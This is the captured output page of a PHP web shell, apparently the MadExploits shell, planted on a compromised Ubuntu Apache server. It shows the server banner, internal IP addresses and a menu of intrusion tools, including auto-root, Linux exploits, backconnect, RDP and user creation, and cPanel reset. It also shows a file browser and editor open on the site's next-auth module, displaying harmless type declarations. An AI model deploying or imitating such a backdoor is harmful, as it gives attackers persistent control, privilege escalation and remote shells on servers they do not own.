Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
next-auth /
core /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxrwxr-x
pages
[ DIR ]
drwxrwxr-x
routes
[ DIR ]
drwxrwxr-x
errors.d.ts
1.93
KB
-rw-rw-r--
errors.d.ts.map
1.19
KB
-rw-rw-r--
errors.js
13.23
KB
-rw-rw-r--
index.d.ts
1015
B
-rw-rw-r--
index.d.ts.map
1.21
KB
-rw-rw-r--
index.js
11.38
KB
-rw-rw-r--
init.d.ts
973
B
-rw-rw-r--
init.d.ts.map
849
B
-rw-rw-r--
init.js
4.86
KB
-rw-rw-r--
types.d.ts
22.19
KB
-rw-rw-r--
types.d.ts.map
5.39
KB
-rw-rw-r--
types.js
79
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.d.ts
import type { AuthAction, AuthOptions } from "./types"; import type { Cookie } from "./lib/cookie"; export interface RequestInternal { /** @default "http://localhost:3000" */ origin?: string; method?: string; cookies?: Partial<Record<string, string>>; headers?: Record<string, any>; query?: Record<string, any>; body?: Record<string, any>; action: AuthAction; providerId?: string; error?: string; } export interface NextAuthHeader { key: string; value: string; } export interface ResponseInternal<Body extends string | Record<string, any> | any[] = any> { status?: number; headers?: NextAuthHeader[]; body?: Body; redirect?: string; cookies?: Cookie[]; } export interface NextAuthHandlerParams { req: Request | RequestInternal; options: AuthOptions; } export declare function AuthHandler<Body extends string | Record<string, any> | any[]>(params: NextAuthHandlerParams): Promise<ResponseInternal<Body>>; //# sourceMappingURL=index.d.ts.map
Close